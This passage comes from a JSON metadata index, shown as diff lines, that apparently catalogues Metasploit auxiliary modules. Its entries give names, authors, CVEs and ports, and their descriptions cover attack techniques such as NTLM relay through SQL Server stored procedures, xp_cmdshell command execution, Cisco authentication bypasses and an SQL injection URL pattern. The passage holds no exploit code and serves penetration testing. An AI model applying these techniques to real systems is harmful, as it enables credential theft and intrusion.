In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_execute_as_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_exec": { + "name": "Microsoft SQL Server Command Execution", + "fullname": "auxiliary/admin/mssql/mssql_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "tebo ", + "arcc " + ], + "description": "This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the\n sp_oacreate procedure (more opsec safe, no output, no temporary data table). 
A valid username and password is\n required to use this module.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx", + "URL-https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_findandsampledata": { + "name": "Microsoft SQL Server Find and Sample Data", + "fullname": "auxiliary/admin/mssql/mssql_findandsampledata", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Scott Sutherland ", + "Robin Wood ", + "humble-desser ", + "Carlos Perez ", + "hdm ", + "todb " + ], + "description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. 
The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.", + "references": [ + "URL-http://www.netspi.com/blog/author/ssutherland/" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_findandsampledata", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_idf": { + "name": "Microsoft SQL Server Interesting Data Finder", + "fullname": "auxiliary/admin/mssql/mssql_idf", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Robin Wood " + ], + "description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n This module has been tested against the latest SQL Server 2019 docker container image (22/04/2021).", + "references": [ + "URL-http://www.digininja.org/metasploit/mssql_idf.php" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_idf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_ntlm_stealer": { + "name": "Microsoft SQL Server NTLM Stealer", + "fullname": 
"auxiliary/admin/mssql/mssql_ntlm_stealer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. 
Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.", + "references": [ + "URL-https://en.wikipedia.org/wiki/SMBRelay" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_ntlm_stealer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": { + "name": "Microsoft SQL Server SQLi NTLM Stealer", + "fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind ", + "Antti " + ], + "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. 
However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.", + "references": [ + "URL-https://en.wikipedia.org/wiki/SMBRelay" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_ntlm_stealer_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_sql": { + "name": "Microsoft SQL Server Generic Query", + "fullname": "auxiliary/admin/mssql/mssql_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "tebo " + ], + "description": "This module will allow for simple SQL statements to be executed against a\n MSSQL/MSDE instance given the appropriate credentials.", + "references": [ + "URL-http://www.attackresearch.com", + "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_sql_file": { + "name": "Microsoft SQL Server Generic Query from File", + "fullname": 
"auxiliary/admin/mssql/mssql_sql_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "j0hn__f : " + ], + "description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_sql_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mysql/mysql_enum": { + "name": "MySQL Enumeration Module", + "fullname": "auxiliary/admin/mysql/mysql_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Carlos Perez " + ], + "description": "This module allows for simple enumeration of MySQL Database Server\n provided proper credentials to connect remotely.", + "references": [ + "URL-https://cisecurity.org/benchmarks.html" + ], + "platform": "", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-03-28 10:34:38 +0000", + "path": "/modules/auxiliary/admin/mysql/mysql_enum.rb", + "is_install_path": true, + "ref_name": "admin/mysql/mysql_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mysql/mysql_sql": { + "name": "MySQL SQL Generic Query", + "fullname": "auxiliary/admin/mysql/mysql_sql", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Bernardo Damele A. G. " + ], + "description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.", + "references": [], + "platform": "", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-02-14 15:26:34 +0000", + "path": "/modules/auxiliary/admin/mysql/mysql_sql.rb", + "is_install_path": true, + "ref_name": "admin/mysql/mysql_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/natpmp/natpmp_map": { + "name": "NAT-PMP Port Mapper", + "fullname": "auxiliary/admin/natpmp/natpmp_map", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jon Hart " + ], + "description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP", + "references": [], + "platform": "", + "arch": "", + "rport": 5351, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb", + "is_install_path": true, + "ref_name": "admin/natpmp/natpmp_map", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/netbios/netbios_spoof": { + "name": "NetBIOS Response Brute Force Spoof (Direct)", + "fullname": "auxiliary/admin/netbios/netbios_spoof", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "vvalien", + "hdm ", + "tombkeeper" + ], + "description": "This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. 
On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.", + "references": [], + "platform": "", + "arch": "", + "rport": 137, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb", + "is_install_path": true, + "ref_name": "admin/netbios/netbios_spoof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/arista_config": { + "name": "Arista Configuration Importer", + "fullname": "auxiliary/admin/networking/arista_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports an Arista device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/arista_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/arista_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/brocade_config": { + "name": "Brocade Configuration Importer", + "fullname": "auxiliary/admin/networking/brocade_config", + "aliases": [ + "auxiliary/admin/brocade/brocade_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module 
imports a Brocade device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/networking/brocade_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/brocade_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_asa_extrabacon": { + "name": "Cisco ASA Authentication Bypass (EXTRABACON)", + "fullname": "auxiliary/admin/networking/cisco_asa_extrabacon", + "aliases": [ + "auxiliary/admin/cisco/cisco_asa_extrabacon" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Sean Dillon ", + "Zachary Harding ", + "Nate Caroe ", + "Dylan Davis ", + "William Webb ", + "Jeff Jarmoc ", + "Equation Group", + "Shadow Brokers" + ], + "description": "This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for payload.", + "references": [ + "CVE-2016-6366", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp", + "URL-https://github.com/RiskSense-Ops/CVE-2016-6366" + ], + "platform": "", + "arch": "", + "rport": 161, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_asa_extrabacon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "EXTRABACON" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "PASS_DISABLE", + "description": "Disable password authentication." 
+ }, + { + "name": "PASS_ENABLE", + "description": "Enable password authentication." + } + ] + }, + "auxiliary_admin/networking/cisco_config": { + "name": "Cisco Configuration Importer", + "fullname": "auxiliary/admin/networking/cisco_config", + "aliases": [ + "auxiliary/admin/cisco/cisco_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a Cisco IOS or NXOS device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_dcnm_auth_bypass": { + "name": "Cisco DCNM auth bypass", + "fullname": "auxiliary/admin/networking/cisco_dcnm_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-01", + "type": "auxiliary", + "author": [ + "MR_ME", + "Yann Castel (yann.castel " + ], + "description": "This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.\n After that, you can login to the web interface with those credentials.\n The only necessary condition is the more or less recent connection of an admin as this exploit\n uses a kind of session stealing.", + "references": [ + "CVE-2019-15975", + "EDB-48018" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-03-31 23:53:41 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb", + 
"is_install_path": true, + "ref_name": "admin/networking/cisco_dcnm_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_dcnm_download": { + "name": "Cisco Data Center Network Manager Unauthenticated File Download", + "fullname": "auxiliary/admin/networking/cisco_dcnm_download", + "aliases": [ + "auxiliary/admin/cisco/cisco_dcnm_download" + ], + "rank": 300, + "disclosure_date": "2019-06-26", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "DCNM exposes a servlet to download files on /fm/downloadServlet.\n An authenticated user can abuse this servlet to download arbitrary files as root by specifying\n the full path of the file.\n This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n work on a few versions below 10.4(2). 
Only version 11.0(1) requires authentication to exploit\n (see References to understand why).", + "references": [ + "CVE-2019-1619", + "CVE-2019-1621", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-dcnm-rce.txt", + "URL-https://seclists.org/fulldisclosure/2019/Jul/7" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-13 18:55:39 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_dcnm_download.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_dcnm_download", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_secure_acs_bypass": { + "name": "Cisco Secure ACS Unauthorized Password Change", + "fullname": "auxiliary/admin/networking/cisco_secure_acs_bypass", + "aliases": [ + "auxiliary/admin/cisco/cisco_secure_acs_bypass" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jason Kratzer " + ], + "description": "This module exploits an authentication bypass issue which allows arbitrary\n password change requests to be issued for any user in the local store.\n Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n as version 5.2 with either no patches or patches 1 and 2 are vulnerable.", + "references": [ + "BID-47093", + "CVE-2011-0951", + "URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 
443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-07-16 05:43:52 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_secure_acs_bypass", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_vpn_3000_ftp_bypass": { + "name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access", + "fullname": "auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass", + "aliases": [ + "auxiliary/admin/cisco/vpn_3000_ftp_bypass" + ], + "rank": 300, + "disclosure_date": "2006-08-23", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. 
This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.", + "references": [ + "BID-19680", + "CVE-2006-4313", + "OSVDB-28139", + "OSVDB-28138" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/f5_config": { + "name": "F5 Configuration Importer", + "fullname": "auxiliary/admin/networking/f5_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports an F5 device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/f5_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/f5_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/juniper_config": { + "name": "Juniper Configuration Importer", + "fullname": "auxiliary/admin/networking/juniper_config", + "aliases": [ + "auxiliary/admin/juniper/juniper_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + 
"author": [ + "h00die" + ], + "description": "This module imports a Juniper ScreenOS or JunOS device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/juniper_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/juniper_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "JUNOS", + "description": "Import JunOS Config File" + }, + { + "name": "SCREENOS", + "description": "Import ScreenOS Config File" + } + ] + }, + "auxiliary_admin/networking/mikrotik_config": { + "name": "Mikrotik Configuration Importer", + "fullname": "auxiliary/admin/networking/mikrotik_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a Mikrotik device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/mikrotik_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/mikrotik_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ROUTEROS", + "description": "Import RouterOS Config File" + }, + { + "name": "SWOS", + "description": "Import SwOS Config File" + } + ] + }, + "auxiliary_admin/networking/ubiquiti_config": { + "name": "Ubiquiti Configuration Importer", + "fullname": 
"auxiliary/admin/networking/ubiquiti_config", + "aliases": [ + "auxiliary/admin/ubiquiti/ubiquiti_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports an Ubiquiti device configuration.\n The db file within the .unf backup is the data file for\n Unifi. This module can take either the db file or .unf.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-23 11:32:45 +0000", + "path": "/modules/auxiliary/admin/networking/ubiquiti_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/ubiquiti_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/vyos_config": { + "name": "VyOS Configuration Importer", + "fullname": "auxiliary/admin/networking/vyos_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a VyOS device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/vyos_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/vyos_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/officescan/tmlisten_traversal": { + "name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access", 
+ "fullname": "auxiliary/admin/officescan/tmlisten_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Anshul Pandey ", + "aushack " + ], + "description": "This module tests for directory traversal vulnerability in the UpdateAgent\n function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro\n OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM\n via dot dot sequences in an HTTP request.", + "references": [ + "OSVDB-48730", + "CVE-2008-2439", + "BID-31531", + "URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt" + ], + "platform": "", + "arch": "", + "rport": 26122, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-11-09 03:00:24 +0000", + "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb", + "is_install_path": true, + "ref_name": "admin/officescan/tmlisten_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/ora_ntlm_stealer": { + "name": "Oracle SMB Relay Code Execution", + "fullname": "auxiliary/admin/oracle/ora_ntlm_stealer", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-04-07", + "type": "auxiliary", + "author": [ + "Sh2kerr " + ], + "description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your sever.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB sever with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server 
which\n runs Oracle. If not than you can decrypt HALFLM hash.", + "references": [ + "URL-http://dsecrg.com/pages/pub/show.php?id=17" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb", + "is_install_path": true, + "ref_name": "admin/oracle/ora_ntlm_stealer", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oracle_index_privesc": { + "name": "Oracle DB Privilege Escalation via Function-Based Index", + "fullname": "auxiliary/admin/oracle/oracle_index_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-21", + "type": "auxiliary", + "author": [ + "David Litchfield", + "Moshe Kaplan" + ], + "description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.", + "references": [ + "URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oracle_index_privesc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + 